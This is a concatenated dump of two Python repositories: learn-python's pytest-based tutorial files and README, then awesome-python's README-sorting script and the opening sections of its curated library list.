def test_modules(): """Modules""" assert fibonacci_module.fibonacci_at_position(7) == 13 assert fibonacci_at_position(7) == 13 assert fibonacci_module_renamed.fibonacci_at_position(7) == 13 assert fibonacci_at_position_renamed(7) == 13 assert fibonacci_module.fibonacci_smaller_than(100) == [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89] assert fibonacci_smaller_than(100) == [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89] assert fibonacci_module_renamed.fibonacci_smaller_than(10) == [0, 1, 1, 2, 3, 5, 8] # If you intend to use a function often you can assign it to a local name. fibonacci = fibonacci_module.fibonacci_smaller_than assert fibonacci(100) == [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89] # The built-in function dir() is used to find out which names a module defines. It returns a # sorted list of strings. assert dir(fibonacci_module) == [ '__builtins__', '__cached__', '__doc__', '__file__', '__loader__', '__name__', '__package__', '__spec__', 'fibonacci_at_position', 'fibonacci_smaller_than', ] File: src/modules/sound_package/__init__.py File: src/modules/sound_package/formats/aif.py """AIF file support.""" def aif_read(): """AIF file reading function mock""" return 'Read from AIF file' File: src/modules/sound_package/formats/__init__.py File: src/modules/sound_package/formats/wav.py """WAV file support.""" def wav_read(): """WAV file reading function mock""" return 'Read from WAV file' File: src/modules/sound_package/effects/reverse.py """Reverse effect.""" def reverse_function(): """Reveres function mock""" return 'Do reverse effect' File: src/modules/sound_package/effects/__init__.py File: src/modules/sound_package/effects/echo.py """Echo effect.""" def echo_function(): """Echo function mock""" return 'Do echo effect' File: src/getting_started/test_variables.py """Variables @see: https://docs.python.org/3/tutorial/introduction.html @see: https://www.w3schools.com/python/python_variables.asp @see: https://www.learnpython.org/en/Variables_and_Types Python is completely object oriented, and not "statically typed". You do not need to declare variables before using them, or declare their type. Every variable in Python is an object. Unlike other programming languages, Python has no command for declaring a variable. A variable is created the moment you first assign a value to it. A variable can have a short name (like x and y) or a more descriptive name (age, carname, total_volume). Rules for Python variables: - A variable name must start with a letter or the underscore character. - A variable name cannot start with a number. - A variable name can only contain alpha-numeric characters and underscores (A-z, 0-9, and _ ). - Variable names are case-sensitive (age, Age and AGE are three different variables). """ def test_variables(): """Test variables""" integer_variable = 5 string_variable = 'John' assert integer_variable == 5 assert string_variable == 'John' variable_with_changed_type = 4 # x is of type int variable_with_changed_type = 'Sally' # x is now of type str assert variable_with_changed_type == 'Sally'
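
# A hedged addition (not in the original file): as the docstring above states, a variable's
# type is determined by the value currently bound to it, which can be verified with isinstance().
def test_variable_types_follow_values():
    """Variable type follows the assigned value."""
    some_variable = 4
    assert isinstance(some_variable, int)

    some_variable = 'Sally'  # Re-binding the same name to a string changes its type.
    assert isinstance(some_variable, str)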
# Playground and Cheatsheet for Learning Python

> 🇺🇦 UKRAINE [IS BEING ATTACKED](https://war.ukraine.ua/) BY RUSSIAN ARMY. CIVILIANS ARE GETTING KILLED. RESIDENTIAL AREAS ARE GETTING BOMBED.
> - Help Ukraine via:
>   - [Serhiy Prytula Charity Foundation](https://prytulafoundation.org/en/)
>   - [Come Back Alive Charity Foundation](https://savelife.in.ua/en/donate-en/)
>   - [National Bank of Ukraine](https://bank.gov.ua/en/news/all/natsionalniy-bank-vidkriv-spetsrahunok-dlya-zboru-koshtiv-na-potrebi-armiyi)
> - More info on [war.ukraine.ua](https://war.ukraine.ua/) and [MFA of Ukraine](https://twitter.com/MFA_Ukraine)

<hr/>

[![Build Status](https://travis-ci.org/trekhleb/learn-python.svg?branch=master)](https://travis-ci.org/trekhleb/learn-python)

> This is a collection of Python scripts that are split by [topics](#table-of-contents) and contain code examples with explanations, different use cases and links to further reading.

> _Read this in:_ [_Português_](README.pt-BR.md), [_Español_](README.es-ES.md), [_Traditional Chinese_](README.zh-TW.md).

It is a **playground** because you may change or add code to see how it works and [test it out](#testing-the-code) using assertions. It also allows you to [lint the code](#linting-the-code) you've written and check whether it follows the Python code style guide. Altogether, this makes the learning process more interactive and helps you keep code quality high from the very beginning.

It is a **cheatsheet** because you may come back to these code examples whenever you want to recap the syntax of [standard Python statements and constructions](#table-of-contents). And because the code is full of assertions, you'll see the expected output of functions and statements right away, without having to run them.

> _You might also be interested in 🤖 [Interactive Machine Learning Experiments](https://github.com/trekhleb/machine-learning-experiments)_

## How to Use This Repository

Each Python script in this repository has the following structure:

```python
"""Lists  <--- Name of the topic here

# @see: https://www.learnpython.org/en/Lists  <-- Link to further reading goes here

Here might go a more detailed explanation of the current topic (i.e. general info about Lists).
"""


def test_list_type():
    """Explanation of the sub-topic goes here.

    Each file contains test functions that illustrate sub-topics (i.e. list type, list methods).
    """

    # Here is an example of how to build a list.  <-- Comments here explain the action
    squares = [1, 4, 9, 16, 25]

    # Lists can be indexed and sliced.
    # Indexing returns the item.
    assert squares[0] == 1  # <-- Assertions here illustrate the result.
    # Slicing returns a new list.
    assert squares[-3:] == [9, 16, 25]  # <-- Assertions here illustrate the result.
```

So normally you might want to do the following:

- [Find the topic](#table-of-contents) you want to learn or recap.
- Read the comments and/or documentation linked in each script's docstring (as in the example above).
- Look at the code examples and assertions to see usage examples and expected output.
- Change the code or add new assertions to see how things work.
- [Run tests](#testing-the-code) and [lint the code](#linting-the-code) to see if it works and is written correctly.

## Table of Contents

1. **Getting Started**
    - [What is Python](src/getting_started/what_is_python.md)
    - [Python Syntax](src/getting_started/python_syntax.md)
    - [Variables](src/getting_started/test_variables.py)
2. 
**Operators** - [Arithmetic Operators](src/operators/test_arithmetic.py) (`+`, `-`, `*`, `/`, `//`, `%`, `**`) - [Bitwise Operators](src/operators/test_bitwise.py) (`&`, `|`, `^`, `>>`, `<<`, `~`) - [Assignment Operators](src/operators/test_assigment.py) (`=`, `+=`, `-=`, `/=`, `//=` etc.) - [Comparison Operator](src/operators/test_comparison.py) (`==`, `!=`, `>`, `<`, `>=`, `<=`) - [Logical Operators](src/operators/test_logical.py) (`and`, `or`, `not`) - [Identity Operators](src/operators/test_identity.py) (`is`, `is not`) - [Membership Operators](src/operators/test_membership.py) (`in`, `not in`) 3. **Data Types** - [Numbers](src/data_types/test_numbers.py) (including booleans) - [Strings](src/data_types/test_strings.py) and their methods - [Lists](src/data_types/test_lists.py) and their methods (including list comprehensions) - [Tuples](src/data_types/test_tuples.py) - [Sets](src/data_types/test_sets.py) and their methods - [Dictionaries](src/data_types/test_dictionaries.py) - [Type Casting](src/data_types/test_type_casting.py) 4. **Control Flow** - [The `if` statement](src/control_flow/test_if.py) - [The `for` statement](src/control_flow/test_for.py) (and `range()` function) - [The `while` statement](src/control_flow/test_while.py) - [The `try` statements](src/control_flow/test_try.py) - [The `break` statement](src/control_flow/test_break.py) - [The `continue` statement](src/control_flow/test_continue.py) 5. **Functions** - [Function Definition](src/functions/test_function_definition.py) (`def` and `return` statements) - [Scopes of Variables Inside Functions](src/functions/test_function_scopes.py) (`global` and `nonlocal` statements) - [Default Argument Values](src/functions/test_function_default_arguments.py) - [Keyword Arguments](src/functions/test_function_keyword_arguments.py) - [Arbitrary Argument Lists](src/functions/test_function_arbitrary_arguments.py) - [Unpacking Argument Lists](src/functions/test_function_unpacking_arguments.py) (`*` and `**` statements) - [Lambda Expressions](src/functions/test_lambda_expressions.py) (`lambda` statement) - [Documentation Strings](src/functions/test_function_documentation_string.py) - [Function Annotations](src/functions/test_function_annotations.py) - [Function Decorators](src/functions/test_function_decorators.py) 6. **Classes** - [Class Definition](src/classes/test_class_definition.py) (`class` statement) - [Class Objects](src/classes/test_class_objects.py) - [Instance Objects](src/classes/test_instance_objects.py) - [Method Objects](src/classes/test_method_objects.py) - [Class and Instance Variables](src/classes/test_class_and_instance_variables.py) - [Inheritance](src/classes/test_inheritance.py) - [Multiple Inheritance](src/classes/test_multiple_inheritance.py) 7. **Modules** - [Modules](src/modules/test_modules.py) (`import` statement) - [Packages](src/modules/test_packages.py) 8. **Errors and Exceptions** - [Handling Exceptions](src/exceptions/test_handle_exceptions.py) (`try` statement) - [Raising Exceptions](src/exceptions/test_raise_exceptions.py) (`raise` statement) 9. **Files** - [Reading and Writing](src/files/test_file_reading.py) (`with` statement) - [Methods of File Objects](src/files/test_file_methods.py) 10. **Additions** - [The `pass` statement](src/additions/test_pass.py) - [Generators](src/additions/test_generators.py) (`yield` statement) 11. 
**Brief Tour of the Standard Libraries**
    - [Serialization](src/standard_libraries/test_json.py) (`json` library)
    - [File Wildcards](src/standard_libraries/test_glob.py) (`glob` library)
    - [String Pattern Matching](src/standard_libraries/test_re.py) (`re` library)
    - [Mathematics](src/standard_libraries/test_math.py) (`math`, `random`, `statistics` libraries)
    - [Dates and Times](src/standard_libraries/test_datetime.py) (`datetime` library)
    - [Data Compression](src/standard_libraries/test_zlib.py) (`zlib` library)
12. **User input**
    - [Terminal input](src/user_input/test_input.py) (`input` statement)

## Prerequisites

**Installing Python**

Make sure that you have [Python3 installed](https://realpython.com/installing-python/) on your machine.

You might want to use the standard [venv](https://docs.python.org/3/library/venv.html) library to create virtual environments, so that Python, pip and all dependent packages are installed and served from a local project directory and don't interfere with system-wide packages and their versions.

Depending on your installation, the Python 3 interpreter may be accessible by running either `python` or `python3`. The same goes for the pip package manager: it may be accessible as either `pip` or `pip3`.

You may check your Python version by running:

```bash
python --version
```

Note that whenever you see `python` in this repository, Python **3** is assumed.

**Installing dependencies**

Install all dependencies required by the project by running:

```bash
pip install -r requirements.txt
```

## Testing the Code

Tests are written using the [pytest](https://docs.pytest.org/en/latest/) framework. You may add new tests of your own by adding files and functions with the `test_` prefix (e.g. `test_topic.py` with a `def test_sub_topic()` function inside); a minimal example of such a file is sketched at the end of this README.

To run all the tests, execute the following command from the project root folder:

```bash
pytest
```

To run specific tests, execute:

```bash
pytest ./path/to/the/test_file.py
```

## Linting the Code

Linting is done using the [pylint](http://pylint.pycqa.org/) and [flake8](http://flake8.pycqa.org/en/latest/) libraries.

### PyLint

To check whether the code follows the [PEP 8](https://www.python.org/dev/peps/pep-0008/) style guide, run:

```bash
pylint ./src/
```

If the linter reports an error (e.g. `missing-docstring`), you may read more about that specific error by running:

```bash
pylint --help-msg=missing-docstring
```

[More about PyLint](http://pylint.pycqa.org/)

### Flake8

To check whether the code follows the [PEP 8](https://www.python.org/dev/peps/pep-0008/) style guide, run:

```bash
flake8 ./src
```

Or, if you want more detailed output, run:

```bash
flake8 ./src --statistics --show-source --count
```

[More about Flake8](http://flake8.pycqa.org/en/latest/)

## Author

- [@trekhleb](https://trekhleb.dev)
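
As a quick illustration (a minimal sketch; the file name and contents below are hypothetical and not part of the existing test suite), a new test file only needs the `test_` prefix and plain `assert` statements to be picked up by pytest:

```python
"""My experiments  <--- Name of the topic here

A scratch file for trying out syntax while reading through the cheatsheet.
"""


def test_string_repetition():
    """Strings support repetition with the * operator."""
    assert 'ab' * 3 == 'ababab'
```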
awesome-python
2252650cfdff3782d5a85458507fe9ec6edde7a4
File: sort.py #!/usr/bin/env python # coding: utf-8 """ The approach taken is explained below. I decided to do it simply. Initially I was considering parsing the data into some sort of structure and then generating an appropriate README. I am still considering doing it - but for now this should work. The only issue I see is that it only sorts the entries at the lowest level, and that the order of the top-level contents do not match the order of the actual entries. This could be extended by having nested blocks, sorting them recursively and flattening the end structure into a list of lines. Revision 2 maybe ^.^. """ def sort_blocks(): # First, we load the current README into memory with open('README.md', 'r') as read_me_file: read_me = read_me_file.read() # Separating the 'table of contents' from the contents (blocks) table_of_contents = ''.join(read_me.split('- - -')[0]) blocks = ''.join(read_me.split('- - -')[1]).split('\n# ') for i in range(len(blocks)): if i == 0: blocks[i] = blocks[i] + '\n' else: blocks[i] = '# ' + blocks[i] + '\n' # Sorting the libraries inner_blocks = sorted(blocks[0].split('##')) for i in range(1, len(inner_blocks)): if inner_blocks[i][0] != '#': inner_blocks[i] = '##' + inner_blocks[i] inner_blocks = ''.join(inner_blocks) # Replacing the non-sorted libraries by the sorted ones and gathering all at the final_README file blocks[0] = inner_blocks final_README = table_of_contents + '- - -' + ''.join(blocks) with open('README.md', 'w+') as sorted_file: sorted_file.write(final_README) def main(): # First, we load the current README into memory as an array of lines with open('README.md', 'r') as read_me_file: read_me = read_me_file.readlines() # Then we cluster the lines together as blocks # Each block represents a collection of lines that should be sorted # This was done by assuming only links ([...](...)) are meant to be sorted # Clustering is done by indentation blocks = [] last_indent = None for line in read_me: s_line = line.lstrip() indent = len(line) - len(s_line) if any([s_line.startswith(s) for s in ['* [', '- [']]): if indent == last_indent: blocks[-1].append(line) else: blocks.append([line]) last_indent = indent else: blocks.append([line]) last_indent = None with open('README.md', 'w+') as sorted_file: # Then all of the blocks are sorted individually blocks = [ ''.join(sorted(block, key=str.lower)) for block in blocks ] # And the result is written back to README.md sorted_file.write(''.join(blocks)) # Then we call the sorting method sort_blocks() if __name__ == "__main__": main()
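
# Usage note (an assumption based on the code above rather than on any documentation): running
# the script from the directory that contains README.md rewrites that file in place, so it is
# worth reviewing the resulting diff before committing.
#
#     $ python sort.py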
# Awesome Python [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) An opinionated list of awesome Python frameworks, libraries, software and resources. Inspired by [awesome-php](https://github.com/ziadoz/awesome-php). - [Awesome Python](#awesome-python) - [Admin Panels](#admin-panels) - [Algorithms and Design Patterns](#algorithms-and-design-patterns) - [ASGI Servers](#asgi-servers) - [Asynchronous Programming](#asynchronous-programming) - [Audio](#audio) - [Authentication](#authentication) - [Build Tools](#build-tools) - [Built-in Classes Enhancement](#built-in-classes-enhancement) - [Caching](#caching) - [ChatOps Tools](#chatops-tools) - [CMS](#cms) - [Code Analysis](#code-analysis) - [Command-line Interface Development](#command-line-interface-development) - [Command-line Tools](#command-line-tools) - [Computer Vision](#computer-vision) - [Configuration Files](#configuration-files) - [Cryptography](#cryptography) - [Data Analysis](#data-analysis) - [Data Validation](#data-validation) - [Data Visualization](#data-visualization) - [Database Drivers](#database-drivers) - [Database](#database) - [Date and Time](#date-and-time) - [Debugging Tools](#debugging-tools) - [Deep Learning](#deep-learning) - [DevOps Tools](#devops-tools) - [Distributed Computing](#distributed-computing) - [Distribution](#distribution) - [Documentation](#documentation) - [Downloader](#downloader) - [Editor Plugins and IDEs](#editor-plugins-and-ides) - [Email](#email) - [Environment Management](#environment-management) - [File Manipulation](#file-manipulation) - [Functional Programming](#functional-programming) - [Game Development](#game-development) - [Geolocation](#geolocation) - [GUI Development](#gui-development) - [Hardware](#hardware) - [HTML Manipulation](#html-manipulation) - [HTTP Clients](#http-clients) - [Image Processing](#image-processing) - [Implementations](#implementations) - [Interactive Interpreter](#interactive-interpreter) - [Internationalization](#internationalization) - [Job Scheduler](#job-scheduler) - [Logging](#logging) - [Machine Learning](#machine-learning) - [Miscellaneous](#miscellaneous) - [Natural Language Processing](#natural-language-processing) - [Network Virtualization](#network-virtualization) - [News Feed](#news-feed) - [ORM](#orm) - [Package Management](#package-management) - [Package Repositories](#package-repositories) - [Penetration testing](#penetration-testing) - [Permissions](#permissions) - [Processes](#processes) - [Recommender Systems](#recommender-systems) - [Refactoring](#refactoring) - [RESTful API](#restful-api) - [Robotics](#robotics) - [RPC Servers](#rpc-servers) - [Science](#science) - [Search](#search) - [Serialization](#serialization) - [Serverless Frameworks](#serverless-frameworks) - [Shell](#shell) - [Specific Formats Processing](#specific-formats-processing) - [Static Site Generator](#static-site-generator) - [Tagging](#tagging) - [Task Queues](#task-queues) - [Template Engine](#template-engine) - [Testing](#testing) - [Text Processing](#text-processing) - [Third-party APIs](#third-party-apis) - [URL Manipulation](#url-manipulation) - [Video](#video) - [Web Asset Management](#web-asset-management) - [Web Content Extracting](#web-content-extracting) - [Web Crawling](#web-crawling) - [Web Frameworks](#web-frameworks) - [WebSocket](#websocket) - [WSGI Servers](#wsgi-servers) - [Resources](#resources) - [Newsletters](#newsletters) - [Podcasts](#podcasts) - 
[Contributing](#contributing) --- ## Admin Panels *Libraries for administrative interfaces.* * [ajenti](https://github.com/ajenti/ajenti) - The admin panel your servers deserve. * [django-grappelli](https://github.com/sehmaschine/django-grappelli) - A jazzy skin for the Django Admin-Interface. * [flask-admin](https://github.com/flask-admin/flask-admin) - Simple and extensible administrative interface framework for Flask. * [flower](https://github.com/mher/flower) - Real-time monitor and web admin for Celery. * [jet-bridge](https://github.com/jet-admin/jet-bridge) - Admin panel framework for any application with nice UI (ex Jet Django). * [wooey](https://github.com/wooey/wooey) - A Django app which creates automatic web UIs for Python scripts. * [streamlit](https://github.com/streamlit/streamlit) - A framework which lets you build dashboards, generate reports, or create chat apps in minutes. ## Algorithms and Design Patterns *Python implementation of data structures, algorithms and design patterns. Also see [awesome-algorithms](https://github.com/tayllan/awesome-algorithms).* * Algorithms * [algorithms](https://github.com/keon/algorithms) - Minimal examples of data structures and algorithms. * [python-ds](https://github.com/prabhupant/python-ds) - A collection of data structure and algorithms for coding interviews. * [sortedcontainers](https://github.com/grantjenks/python-sortedcontainers) - Fast and pure-Python implementation of sorted collections. * [thealgorithms](https://github.com/TheAlgorithms/Python) - All Algorithms implemented in Python. * Design Patterns * [pypattyrn](https://github.com/tylerlaberge/PyPattyrn) - A simple yet effective library for implementing common design patterns. * [python-patterns](https://github.com/faif/python-patterns) - A collection of design patterns in Python. * [transitions](https://github.com/pytransitions/transitions) - A lightweight, object-oriented finite state machine implementation. ## ASGI Servers *[ASGI](https://asgi.readthedocs.io/en/latest/)-compatible web servers.* * [daphne](https://github.com/django/daphne) - A HTTP, HTTP2 and WebSocket protocol server for ASGI and ASGI-HTTP. * [uvicorn](https://github.com/encode/uvicorn) - A lightning-fast ASGI server implementation, using uvloop and httptools. * [hypercorn](https://github.com/pgjones/hypercorn) - An ASGI and WSGI Server based on Hyper libraries and inspired by Gunicorn. ## Asynchronous Programming *Libraries for asynchronous, concurrent and parallel execution. Also see [awesome-asyncio](https://github.com/timofurrer/awesome-asyncio).* * [asyncio](https://docs.python.org/3/library/asyncio.html) - (Python standard library) Asynchronous I/O, event loop, coroutines and tasks. - [awesome-asyncio](https://github.com/timofurrer/awesome-asyncio) * [concurrent.futures](https://docs.python.org/3/library/concurrent.futures.html) - (Python standard library) A high-level interface for asynchronously executing callables. * [multiprocessing](https://docs.python.org/3/library/multiprocessing.html) - (Python standard library) Process-based parallelism. * [trio](https://github.com/python-trio/trio) - A friendly library for async concurrency and I/O. * [twisted](https://github.com/twisted/twisted) - An event-driven networking engine. * [uvloop](https://github.com/MagicStack/uvloop) - Ultra fast asyncio event loop. * [eventlet](https://github.com/eventlet/eventlet) - Asynchronous framework with WSGI support. 
* [gevent](https://github.com/gevent/gevent) - A coroutine-based Python networking library that uses [greenlet](https://github.com/python-greenlet/greenlet). ## Audio *Libraries for manipulating audio and its metadata.* * Audio * [audioread](https://github.com/beetbox/audioread) - Cross-library (GStreamer + Core Audio + MAD + FFmpeg) audio decoding. * [audioFlux](https://github.com/libAudioFlux/audioFlux) - A library for audio and music analysis, feature extraction. * [dejavu](https://github.com/worldveil/dejavu) - Audio fingerprinting and recognition. * [kapre](https://github.com/keunwoochoi/kapre) - Keras Audio Preprocessors. * [librosa](https://github.com/librosa/librosa) - Python library for audio and music analysis. * [matchering](https://github.com/sergree/matchering) - A library for automated reference audio mastering. * [mingus](http://bspaans.github.io/python-mingus/) - An advanced music theory and notation package with MIDI file and playback support. * [pyaudioanalysis](https://github.com/tyiannak/pyAudioAnalysis) - Audio feature extraction, classification, segmentation and applications. * [pydub](https://github.com/jiaaro/pydub) - Manipulate audio with a simple and easy high level interface. * [timeside](https://github.com/Parisson/TimeSide) - Open web audio processing framework. * Metadata * [beets](https://github.com/beetbox/beets) - A music library manager and [MusicBrainz](https://musicbrainz.org/) tagger. * [eyed3](https://github.com/nicfit/eyeD3) - A tool for working with audio files, specifically MP3 files containing ID3 metadata. * [mutagen](https://github.com/quodlibet/mutagen) - A Python module to handle audio metadata. * [tinytag](https://github.com/devsnd/tinytag) - A library for reading music meta data of MP3, OGG, FLAC and Wave files. ## Authentication *Libraries for implementing authentications schemes.* * OAuth * [authlib](https://github.com/lepture/authlib) - JavaScript Object Signing and Encryption draft implementation. * [django-allauth](https://github.com/pennersr/django-allauth) - Authentication app for Django that "just works." * [django-oauth-toolkit](https://github.com/jazzband/django-oauth-toolkit) - OAuth 2 goodies for Django. * [oauthlib](https://github.com/oauthlib/oauthlib) - A generic and thorough implementation of the OAuth request-signing logic. * JWT * [pyjwt](https://github.com/jpadilla/pyjwt) - JSON Web Token implementation in Python. * [python-jose](https://github.com/mpdavis/python-jose/) - A JOSE implementation in Python. ## Build Tools *Compile software from source code.* * [bitbake](https://github.com/openembedded/bitbake) - A make-like build tool for embedded Linux. * [buildout](https://github.com/buildout/buildout) - A build system for creating, assembling and deploying applications from multiple parts. * [platformio](https://github.com/platformio/platformio-core) - A console tool to build code with different development platforms. * [pybuilder](https://github.com/pybuilder/pybuilder) - A continuous build tool written in pure Python. * [scons](https://github.com/SCons/scons) - A software construction tool. ## Built-in Classes Enhancement *Libraries for enhancing Python built-in classes.* * [attrs](https://github.com/python-attrs/attrs) - Replacement for `__init__`, `__eq__`, `__repr__`, etc. boilerplate in class definitions. * [bidict](https://github.com/jab/bidict) - Efficient, Pythonic bidirectional map data structures and related functionality.. 
* [box](https://github.com/cdgriffith/Box) - Python dictionaries with advanced dot notation access. * [dataclasses](https://docs.python.org/3/library/dataclasses.html) - (Python standard library) Data classes. * [dotteddict](https://github.com/carlosescri/DottedDict) - A library that provides a method of accessing lists and dicts with a dotted path notation. ## CMS *Content Management Systems.* * [feincms](https://github.com/feincms/feincms) - One of the most advanced Content Management Systems built on Django. * [indico](https://github.com/indico/indico) - A feature-rich event management system, made @ [CERN](https://en.wikipedia.org/wiki/CERN). * [wagtail](https://github.com/wagtail/wagtail) - A Django content management system. ## Caching *Libraries for caching data.* * [beaker](https://github.com/bbangert/beaker) - A WSGI middleware for sessions and caching. * [django-cache-machine](https://github.com/django-cache-machine/django-cache-machine) - Automatic caching and invalidation for Django models. * [django-cacheops](https://github.com/Suor/django-cacheops) - A slick ORM cache with automatic granular event-driven invalidation. * [dogpile.cache](https://github.com/sqlalchemy/dogpile.cache) - dogpile.cache is a next generation replacement for Beaker made by the same authors. * [hermescache](https://pypi.org/project/HermesCache/) - Python caching library with tag-based invalidation and dogpile effect prevention. * [pylibmc](https://github.com/lericson/pylibmc) - A Python wrapper around the [libmemcached](https://libmemcached.org/libMemcached.html) interface. * [python-diskcache](https://github.com/grantjenks/python-diskcache) - SQLite and file backed cache backend with faster lookups than memcached and redis. ## ChatOps Tools *Libraries for chatbot development.* * [errbot](https://github.com/errbotio/errbot/) - The easiest and most popular chatbot to implement ChatOps. ## Code Analysis *Tools of static analysis, linters and code quality checkers. Also see [awesome-static-analysis](https://github.com/mre/awesome-static-analysis).* * Code Analysis * [code2flow](https://github.com/scottrogowski/code2flow) - Turn your Python and JavaScript code into DOT flowcharts. * [prospector](https://github.com/PyCQA/prospector) - A tool to analyse Python code. * [vulture](https://github.com/jendrikseipp/vulture) - A tool for finding and analysing dead Python code. * Code Linters * [flake8](https://github.com/PyCQA/flake8) - A wrapper around `pycodestyle`, `pyflakes` and McCabe. * [awesome-flake8-extensions](https://github.com/DmytroLitvinov/awesome-flake8-extensions) * [pylint](https://github.com/pylint-dev/pylint) - A fully customizable source code analyzer. * Code Formatters * [black](https://github.com/psf/black) - The uncompromising Python code formatter. * [isort](https://github.com/timothycrosley/isort) - A Python utility / library to sort imports. * [yapf](https://github.com/google/yapf) - Yet another Python code formatter from Google. * Static Type Checkers, also see [awesome-python-typing](https://github.com/typeddjango/awesome-python-typing) * [mypy](https://github.com/python/mypy) - Check variable types during compile time. * [pyre-check](https://github.com/facebook/pyre-check) - Performant type checking. * [typeshed](https://github.com/python/typeshed) - Collection of library stubs for Python, with static types. * Static Type Annotations Generators * [monkeytype](https://github.com/Instagram/MonkeyType) - A system for Python that generates static type annotations by collecting runtime types. 
* [pytype](https://github.com/google/pytype) - Pytype checks and infers types for Python code - without requiring type annotations. ## Command-line Interface Development *Libraries for building command-line applications.* * Command-line Application Development * [cement](https://github.com/datafolklabs/cement) - CLI Application Framework for Python. * [click](https://github.com/pallets/click/) - A package for creating beautiful command line interfaces in a composable way. * [cliff](https://github.com/openstack/cliff) - A framework for creating command-line programs with multi-level commands. * [python-fire](https://github.com/google/python-fire) - A library for creating command line interfaces from absolutely any Python object. * [python-prompt-toolkit](https://github.com/prompt-toolkit/python-prompt-toolkit) - A library for building powerful interactive command lines. * Terminal Rendering * [alive-progress](https://github.com/rsalmei/alive-progress) - A new kind of Progress Bar, with real-time throughput, eta and very cool animations. * [asciimatics](https://github.com/peterbrittain/asciimatics) - A package to create full-screen text UIs (from interactive forms to ASCII animations). * [bashplotlib](https://github.com/glamp/bashplotlib) - Making basic plots in the terminal. * [colorama](https://github.com/tartley/colorama) - Cross-platform colored terminal text. * [rich](https://github.com/Textualize/rich) - Python library for rich text and beautiful formatting in the terminal. Also provides a great `RichHandler` log handler. * [tqdm](https://github.com/tqdm/tqdm) - Fast, extensible progress bar for loops and CLI. ## Command-line Tools *Useful CLI-based tools for productivity.* * Productivity Tools * [copier](https://github.com/copier-org/copier) - A library and command-line utility for rendering projects templates. * [cookiecutter](https://github.com/cookiecutter/cookiecutter) - A command-line utility that creates projects from cookiecutters (project templates). * [doitlive](https://github.com/sloria/doitlive) - A tool for live presentations in the terminal. * [howdoi](https://github.com/gleitz/howdoi) - Instant coding answers via the command line. * [invoke](https://github.com/pyinvoke/invoke) - A tool for managing shell-oriented subprocesses and organizing executable Python code into CLI-invokable tasks. * [pathpicker](https://github.com/facebook/PathPicker) - Select files out of bash output. * [thefuck](https://github.com/nvbn/thefuck) - Correcting your previous console command. * [tmuxp](https://github.com/tmux-python/tmuxp) - A [tmux](https://github.com/tmux/tmux) session manager. * [try](https://github.com/timofurrer/try) - A dead simple CLI to try out python packages - it's never been easier. * CLI Enhancements * [httpie](https://github.com/httpie/cli) - A command line HTTP client, a user-friendly cURL replacement. * [iredis](https://github.com/laixintao/iredis) - Redis CLI with autocompletion and syntax highlighting. * [litecli](https://github.com/dbcli/litecli) - SQLite CLI with autocompletion and syntax highlighting. * [mycli](https://github.com/dbcli/mycli) - MySQL CLI with autocompletion and syntax highlighting. * [pgcli](https://github.com/dbcli/pgcli) - PostgreSQL CLI with autocompletion and syntax highlighting. ## Computer Vision *Libraries for Computer Vision.* * [easyocr](https://github.com/JaidedAI/EasyOCR) - Ready-to-use OCR with 40+ languages supported. * [kornia](https://github.com/kornia/kornia/) - Open Source Differentiable Computer Vision Library for PyTorch. 
* [opencv](https://opencv.org/) - Open Source Computer Vision Library. * [pytesseract](https://github.com/madmaze/pytesseract) - A wrapper for [Google Tesseract OCR](https://github.com/tesseract-ocr). * [tesserocr](https://github.com/sirfz/tesserocr) - Another simple, Pillow-friendly, wrapper around the `tesseract-ocr` API for OCR. ## Configuration Files *Libraries for storing and parsing configuration options.* * [configparser](https://docs.python.org/3/library/configparser.html) - (Python standard library) INI file parser. * [configobj](https://github.com/DiffSK/configobj) - INI file parser with validation. * [hydra](https://github.com/facebookresearch/hydra) - Hydra is a framework for elegantly configuring complex applications. * [python-decouple](https://github.com/HBNetwork/python-decouple) - Strict separation of settings from code. ## Cryptography * [cryptography](https://github.com/pyca/cryptography) - A package designed to expose cryptographic primitives and recipes to Python developers. * [paramiko](https://github.com/paramiko/paramiko) - The leading native Python SSHv2 protocol library. * [pynacl](https://github.com/pyca/pynacl) - Python binding to the Networking and Cryptography (NaCl) library. ## Data Analysis *Libraries for data analyzing.* * [pandas](http://pandas.pydata.org/) - A library providing high-performance, easy-to-use data structures and data analysis tools. * [aws-sdk-pandas](https://github.com/aws/aws-sdk-pandas) - Pandas on AWS. * [datasette](https://github.com/simonw/datasette) - An open source multi-tool for exploring and publishing data. * [optimus](https://github.com/hi-primus/optimus) - Agile Data Science Workflows made easy with PySpark. ## Data Validation *Libraries for validating data. Used for forms in many cases.* * [cerberus](https://github.com/pyeve/cerberus) - A lightweight and extensible data validation library. * [colander](https://github.com/Pylons/colander) - Validating and deserializing data obtained via XML, JSON, an HTML form post. * [jsonschema](https://github.com/python-jsonschema/jsonschema) - An implementation of [JSON Schema](http://json-schema.org/) for Python. * [schema](https://github.com/keleshev/schema) - A library for validating Python data structures. * [schematics](https://github.com/schematics/schematics) - Data Structure Validation. * [voluptuous](https://github.com/alecthomas/voluptuous) - A Python data validation library. * [pydantic](https://github.com/pydantic/pydantic) - Data validation using Python type hints. ## Data Visualization *Libraries for visualizing data. Also see [awesome-javascript](https://github.com/sorrycc/awesome-javascript#data-visualization).* * [altair](https://github.com/altair-viz/altair) - Declarative statistical visualization library for Python. * [bokeh](https://github.com/bokeh/bokeh) - Interactive Web Plotting for Python. * [bqplot](https://github.com/bloomberg/bqplot) - Interactive Plotting Library for the Jupyter Notebook. * [cartopy](https://github.com/SciTools/cartopy) - A cartographic python library with matplotlib support. * [diagrams](https://github.com/mingrammer/diagrams) - Diagram as Code. * [matplotlib](https://github.com/matplotlib/matplotlib) - A Python 2D plotting library. * [plotnine](https://github.com/has2k1/plotnine) - A grammar of graphics for Python based on ggplot2. * [pygal](https://github.com/Kozea/pygal) - A Python SVG Charts Creator. * [pygraphviz](https://github.com/pygraphviz/pygraphviz/) - Python interface to [Graphviz](http://www.graphviz.org/). 
